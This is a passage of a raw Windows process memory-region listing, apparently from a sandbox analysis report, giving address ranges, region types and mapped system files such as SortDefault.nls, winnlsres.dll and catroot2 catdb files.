id = 2255 start_va = 0xf610c20000 end_va = 0xf610d1ffff entry_point = 0x0 region_type = private name = "private_0x000000f610c20000" filename = "" Region: id = 2256 start_va = 0xf610d20000 end_va = 0xf610e1ffff entry_point = 0x0 region_type = private name = "private_0x000000f610d20000" filename = "" Region: id = 2257 start_va = 0xf610e20000 end_va = 0xf610e9ffff entry_point = 0x0 region_type = private name = "private_0x000000f610e20000" filename = "" Region: id = 2258 start_va = 0xf610ea0000 end_va = 0xf610ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f610ea0000" filename = "" Region: id = 2259 start_va = 0xf610eb0000 end_va = 0xf6111e6fff entry_point = 0xf610eb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2260 start_va = 0xf6111f0000 end_va = 0xf6112effff entry_point = 0x0 region_type = private name = "private_0x000000f6111f0000" filename = "" Region: id = 2261 start_va = 0xf6112f0000 end_va = 0xf6112f0fff entry_point = 0x0 region_type = private name = "private_0x000000f6112f0000" filename = "" Region: id = 2262 start_va = 0xf611300000 end_va = 0xf611304fff entry_point = 0xf611300000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 2263 start_va = 0xf611310000 end_va = 0xf61131ffff entry_point = 0xf611310000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 2264 start_va = 0xf611320000 end_va = 0xf611322fff entry_point = 0xf611320000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 2265 start_va = 0xf611330000 end_va = 0xf611336fff entry_point = 0x0 region_type = private name = "private_0x000000f611330000" filename = "" Region: id = 2266 start_va = 0xf611340000 end_va = 0xf611340fff entry_point = 0x0 region_type = private name = "private_0x000000f611340000" filename = "" Region: id = 2267 start_va = 0xf611350000 end_va = 0xf611350fff entry_point = 0x0 region_type = private name = "private_0x000000f611350000" filename = "" Region: id = 2268 start_va = 0xf611360000 end_va = 0xf61136ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611360000" filename = "" Region: id = 2269 start_va = 0xf611370000 end_va = 0xf61137ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611370000" filename = "" Region: id = 2270 start_va = 0xf611380000 end_va = 0xf61138ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611380000" filename = "" Region: id = 2271 start_va = 0xf611390000 end_va = 0xf61139ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611390000" filename = "" Region: id = 2272 start_va = 0xf6113a0000 end_va = 0xf6113affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f6113a0000" filename = "" Region: id = 2273 start_va = 0xf6113b0000 end_va = 0xf6113bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f6113b0000" filename = "" Region: id = 2274 start_va = 0xf6113c0000 end_va = 0xf6113c0fff entry_point = 0x0 region_type = private name = "private_0x000000f6113c0000" filename = "" Region: id = 2275 start_va = 0xf6113d0000 end_va = 0xf6113d0fff entry_point = 0x0 region_type = private name = "private_0x000000f6113d0000" filename = "" Region: id = 2276 start_va = 0xf6113e0000 end_va = 0xf6113e0fff entry_point = 0x0 region_type = private name = "private_0x000000f6113e0000" filename = "" Region: id = 2277 start_va = 0xf6113f0000 end_va = 0xf6113f8fff entry_point = 0xf6113f0000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 2278 start_va = 0xf611400000 end_va = 0xf6114fffff entry_point = 0x0 region_type = private name = "private_0x000000f611400000" filename = "" Region: id = 2279 start_va = 0xf611500000 end_va = 0xf611503fff entry_point = 0x0 region_type = private name = "private_0x000000f611500000" filename = "" Region: id = 2280 start_va = 0xf611510000 end_va = 0xf611511fff entry_point = 0x0 region_type = private name = "private_0x000000f611510000" filename = "" Region: id = 2281 start_va = 0xf611520000 end_va = 0xf611520fff entry_point = 0x0 region_type = private name = "private_0x000000f611520000" filename = "" Region: id = 2282 start_va = 0xf611530000 end_va = 0xf611536fff entry_point = 0x0 region_type = private name = "private_0x000000f611530000" filename = "" Region: id = 2283 start_va = 0xf611540000 end_va = 0xf61154ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611540000" filename = "" Region: id = 2284 start_va = 0xf611550000 end_va = 0xf61155ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611550000" filename = "" Region: id = 2285 start_va = 0xf611560000 end_va = 0xf61156ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611560000" filename = "" Region: id = 2286 start_va = 0xf611570000 end_va = 0xf61157ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611570000" filename = "" Region: id = 2287 start_va = 0xf611580000 end_va = 0xf61158ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611580000" filename = "" Region: id = 2288 start_va = 0xf611590000 end_va = 0xf61159ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f611590000" filename = "" Region: id = 2289 start_va = 0xf6115a0000 end_va = 0xf6115a0fff entry_point = 0x0 region_type = private name = "private_0x000000f6115a0000" filename = "" Region: id = 2290 start_va = 0xf6115b0000 end_va = 0xf6115bffff entry_point = 0xf6115b0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2291 start_va = 0xf6115c0000 end_va = 0xf6115c6fff entry_point = 0x0 region_type = private name = "private_0x000000f6115c0000" filename = "" Region: id = 2292 start_va = 0xf6115d0000 end_va = 0xf6115dffff entry_point = 0xf6115d0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2293 start_va = 0xf6115e0000 end_va = 0xf6115effff entry_point = 0xf6115e0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2294 start_va = 0xf6115f0000 end_va = 0xf6115fffff entry_point = 0xf6115f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2295 start_va = 0xf611600000 end_va = 0xf6116fffff entry_point = 0x0 region_type = private name = "private_0x000000f611600000" filename = "" Region: id = 2296 start_va = 0xf611700000 end_va = 0xf6117c1fff entry_point = 0x0 region_type = private name = "private_0x000000f611700000" filename = "" Region: id = 2297 start_va = 0xf6117d0000 end_va = 0xf61184ffff entry_point = 0x0 region_type = private name = "private_0x000000f6117d0000" filename = "" Region: id = 2298 start_va = 0xf611850000 end_va = 0xf611856fff entry_point = 0x0 region_type = private name = "private_0x000000f611850000" filename = "" Region: id = 2299 start_va = 0xf611860000 end_va = 0xf61186ffff entry_point = 0xf611860000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2300 start_va = 0xf611870000 end_va = 0xf61187ffff entry_point = 0xf611870000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2301 start_va = 0xf611880000 end_va = 0xf61188ffff entry_point = 0xf611880000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2302 start_va = 0xf611890000 end_va = 0xf61189ffff entry_point = 0xf611890000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2303 start_va = 0xf6118a0000 end_va = 0xf6118affff entry_point = 0xf6118a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2304 start_va = 0xf6118b0000 end_va = 0xf6118bffff entry_point = 0xf6118b0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2305 start_va = 0xf6118c0000 end_va = 0xf6118cffff entry_point = 0xf6118c0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2306 start_va = 0xf6118d0000 end_va = 0xf6118dffff entry_point = 0xf6118d0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2307 start_va = 0xf6118e0000 end_va = 0xf6118effff entry_point = 0xf6118e0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2308 start_va = 0xf6118f0000 end_va = 0xf6118fffff entry_point = 0xf6118f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2309 start_va = 0xf611900000 end_va = 0xf6119fffff entry_point = 0x0 region_type = private name = "private_0x000000f611900000" filename = "" Region: id = 2310 start_va = 0xf611a00000 end_va = 0xf611afffff entry_point = 0x0 region_type = private name = "private_0x000000f611a00000" filename = "" Region: id = 2311 start_va = 0xf611b00000 end_va = 0xf611bfffff entry_point = 0x0 region_type = private name = "private_0x000000f611b00000" filename = "" Region: id = 2312 start_va = 0xf611c00000 end_va = 0xf611cfffff entry_point = 0x0 region_type = private name = "private_0x000000f611c00000" filename = "" Region: id = 2313 start_va = 0xf611d00000 end_va = 0xf611dfffff entry_point = 0x0 region_type = private name = "private_0x000000f611d00000" filename = "" Region: id = 2314 start_va = 0xf611e00000 end_va = 0xf611efffff entry_point = 0x0 region_type = private name = "private_0x000000f611e00000" filename = "" Region: id = 2315 start_va = 0xf611f00000 end_va = 0xf611ffffff entry_point = 0x0 region_type = private name = "private_0x000000f611f00000" filename = "" Region: id = 2316 start_va = 0xf612000000 end_va = 0xf6120fffff entry_point = 0x0 region_type = private name = "private_0x000000f612000000" filename = "" Region: id = 2317 start_va = 0xf612100000 end_va = 0xf6121fffff entry_point = 0x0 region_type = private name = "private_0x000000f612100000" filename = "" Region: id = 2318 start_va = 0xf612200000 end_va = 0xf6122fffff entry_point = 0x0 region_type = private name = "private_0x000000f612200000" filename = "" Region: id = 2319 start_va = 0xf612300000 end_va = 0xf6123fffff entry_point = 0x0 region_type = private name = "private_0x000000f612300000" filename = "" Region: id = 2320 start_va = 0xf612400000 end_va = 0xf6124fffff entry_point = 0x0 region_type = private name = "private_0x000000f612400000" filename = "" Region: id = 2321 start_va = 0xf612500000 end_va = 0xf6125fffff entry_point = 0x0 region_type = private name = "private_0x000000f612500000" filename = "" Region: id = 2322 start_va = 0xf612600000 end_va = 0xf6126fffff entry_point = 0x0 region_type = private name = "private_0x000000f612600000" filename = "" Region: id = 2323 start_va = 0xf612700000 end_va = 0xf6127fffff entry_point = 0x0 region_type = private name = "private_0x000000f612700000" filename = "" Region: id = 2324 start_va = 0xf612800000 end_va = 0xf6137fffff entry_point = 0x0 region_type = private name = "private_0x000000f612800000" filename = "" Region: id = 2325 start_va = 0xf613800000 end_va = 0xf613a0ffff entry_point = 0x0 region_type = private name = "private_0x000000f613800000" filename = "" Region: id = 2326 start_va = 0xf613a10000 end_va = 0xf623a0ffff entry_point = 0x0 region_type = private name = "private_0x000000f613a10000" filename = "" Region: id = 2327 start_va = 0xf623a10000 end_va = 0xf633a0ffff entry_point = 0x0 region_type = private name = "private_0x000000f623a10000" filename = "" Region: id = 2328 start_va = 0xf633a10000 end_va = 0xf633a1ffff entry_point = 0xf633a10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2329 start_va = 0xf633a20000 end_va = 0xf633a2ffff entry_point = 0xf633a20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2330 start_va = 0xf633a30000 end_va = 0xf633aaffff entry_point = 0x0 region_type = private name = "private_0x000000f633a30000" filename = "" Region: id = 2331 start_va = 0xf633ab0000 end_va = 0xf633ab0fff entry_point = 0x0 region_type = private name = "private_0x000000f633ab0000" filename = "" Region: id = 2332 start_va = 0xf633ac0000 end_va = 0xf633acffff entry_point = 0xf633ac0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2333 start_va = 0xf633ad0000 end_va = 0xf633adffff entry_point = 0xf633ad0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2334 start_va = 0xf633ae0000 end_va = 0xf633aeffff entry_point = 0xf633ae0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 2335 start_va = 0xf633af0000 end_va = 0xf643aeffff entry_point = 0x0 region_type = private name = "private_0x000000f633af0000" filename = "" Region: id = 2336 start_va = 0xf643af0000 end_va = 0xf653aeffff entry_point = 0x0 region_type = private name = "private_0x000000f643af0000" filename = "" Region: id = 2337 start_va = 0xf653af0000 end_va = 0xf653af0fff entry_point = 0x0 region_type = private name = "private_0x000000f653af0000" filename = "" Region: id = 2338 start_va = 0xf653b00000 end_va = 0xf653b0ffff entry_point = 0xf653b00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2339 start_va = 0xf653b10000 end_va = 0xf653b1ffff entry_point = 0xf653b10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2340 start_va = 0xf653b20000 end_va = 0xf653b2ffff entry_point = 0xf653b20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2341 start_va = 0xf653b30000 end_va = 0xf653b3ffff entry_point = 0xf653b30000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2342 start_va = 0xf653b40000 end_va = 0xf653b4ffff entry_point = 0xf653b40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2343 start_va = 0xf653b50000 end_va = 0xf653b5ffff entry_point = 0xf653b50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2344 start_va = 0xf653b60000 end_va = 0xf653b6ffff entry_point = 0xf653b60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2345 start_va = 0xf653b70000 end_va = 0xf653b7ffff entry_point = 0xf653b70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2346 start_va = 0xf653b80000 end_va = 0xf653b8ffff entry_point = 0xf653b80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2347 start_va = 0xf653b90000 end_va = 0xf653b9ffff entry_point = 0xf653b90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2348 start_va = 0xf653ba0000 end_va = 0xf653baffff entry_point = 0xf653ba0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2349 start_va = 0xf653bb0000 end_va = 0xf653bbffff entry_point = 0xf653bb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2350 start_va = 0xf653bc0000 end_va = 0xf653bcffff entry_point = 0xf653bc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2351 start_va = 0xf653bd0000 end_va = 0xf653bdffff entry_point = 0xf653bd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2352 start_va = 0xf653be0000 end_va = 0xf653beffff entry_point = 0xf653be0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2353 start_va = 0xf653bf0000 end_va = 0xf653bfffff entry_point = 0xf653bf0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2354 start_va = 0xf653c00000 end_va = 0xf653c0ffff entry_point = 0xf653c00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2355 start_va = 0xf653c10000 end_va = 0xf653c1ffff entry_point = 0xf653c10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2356 start_va = 0xf653c20000 end_va = 0xf653c2ffff entry_point = 0xf653c20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2357 start_va = 0xf653c30000 end_va = 0xf653c3ffff entry_point = 0xf653c30000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2358 start_va = 0xf653c40000 end_va = 0xf653c4ffff entry_point = 0xf653c40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2359 start_va = 0xf653c50000 end_va = 0xf653c5ffff entry_point = 0xf653c50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 2360 start_va = 0xf653c60000 end_va = 0xf653d5ffff entry_point = 0x0 region_type = private name = "private_0x000000f653c60000" filename = "" Region: id = 2361 start_va = 0x7df5fffc0000 end_va = 0x7ff5fffbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2362 start_va = 0x7ff6e0bf6000 end_va = 0x7ff6e0bf7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf6000" filename = "" Region: id = 2363 start_va = 0x7ff6e0bf8000 end_va = 0x7ff6e0bf9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf8000" filename = "" Region: id = 2364 start_va = 0x7ff6e0bfa000 end_va = 0x7ff6e0bfbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfa000" filename = "" Region: id = 2365 start_va = 0x7ff6e0bfc000 end_va = 0x7ff6e0bfdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfc000" filename = "" Region: id = 2366 start_va = 0x7ff6e0bfe000 end_va = 0x7ff6e0bfffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfe000" filename = "" Region: id = 2367 start_va = 0x7ff6e0c00000 end_va = 0x7ff6e0c01fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c00000" filename = "" Region: id = 2368 start_va = 0x7ff6e0c02000 end_va = 0x7ff6e0c03fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c02000" filename = "" Region: id = 2369 start_va = 0x7ff6e0c04000 end_va = 0x7ff6e0c05fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c04000" filename = "" Region: id = 2370 start_va = 0x7ff6e0c06000 end_va = 0x7ff6e0c07fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c06000" filename = "" Region: id = 2371 start_va = 0x7ff6e0c08000 end_va = 0x7ff6e0c09fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c08000" filename = "" Region: id = 2372 start_va = 0x7ff6e0c0a000 end_va = 0x7ff6e0c0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c0a000" filename = "" Region: id = 2373 start_va = 0x7ff6e0c0c000 end_va = 0x7ff6e0c0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c0c000" filename = "" Region: id = 2374 start_va = 0x7ff6e0c0e000 end_va = 0x7ff6e0c0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c0e000" filename = "" Region: id = 2375 start_va = 0x7ff6e0c10000 end_va = 0x7ff6e0c11fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c10000" filename = "" Region: id = 2376 start_va = 0x7ff6e0c12000 end_va = 0x7ff6e0c13fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c12000" filename = "" Region: id = 2377 start_va = 0x7ff6e0c14000 end_va = 0x7ff6e0c15fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c14000" filename = "" Region: id = 2378 start_va = 0x7ff6e0c16000 end_va = 0x7ff6e0c17fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c16000" filename = "" Region: id = 2379 start_va = 0x7ff6e0c18000 end_va = 0x7ff6e0c19fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c18000" filename = "" Region: id = 2380 start_va = 0x7ff6e0c1a000 end_va = 0x7ff6e0c1bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c1a000" filename = "" Region: id = 2381 start_va = 0x7ff6e0c1c000 end_va = 0x7ff6e0c1dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c1c000" filename = "" Region: id = 2382 start_va = 0x7ff6e0c1e000 end_va = 0x7ff6e0c1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0c1e000" filename = "" Region: id = 2383 start_va = 0x7ff6e0c20000 end_va = 0x7ff6e0d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0c20000" filename = "" Region: id = 2384 start_va = 0x7ff6e0d20000 end_va = 0x7ff6e0d42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0d20000" filename = "" Region: id = 2385 start_va = 0x7ff6e0d43000 end_va = 0x7ff6e0d44fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d43000" filename = "" Region: id = 2386 start_va = 0x7ff6e0d45000 end_va = 0x7ff6e0d46fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d45000" filename = "" Region: id = 2387 start_va = 0x7ff6e0d47000 end_va = 0x7ff6e0d48fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d47000" filename = "" Region: id = 2388 start_va = 0x7ff6e0d49000 end_va = 0x7ff6e0d4afff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d49000" filename = "" Region: id = 2389 start_va = 0x7ff6e0d4b000 end_va = 0x7ff6e0d4cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d4b000" filename = "" Region: id = 2390 start_va = 0x7ff6e0d4d000 end_va = 0x7ff6e0d4dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d4d000" filename = "" Region: id = 2391 start_va = 0x7ff6e0d4e000 end_va = 0x7ff6e0d4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d4e000" filename = "" Region: id = 2392 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 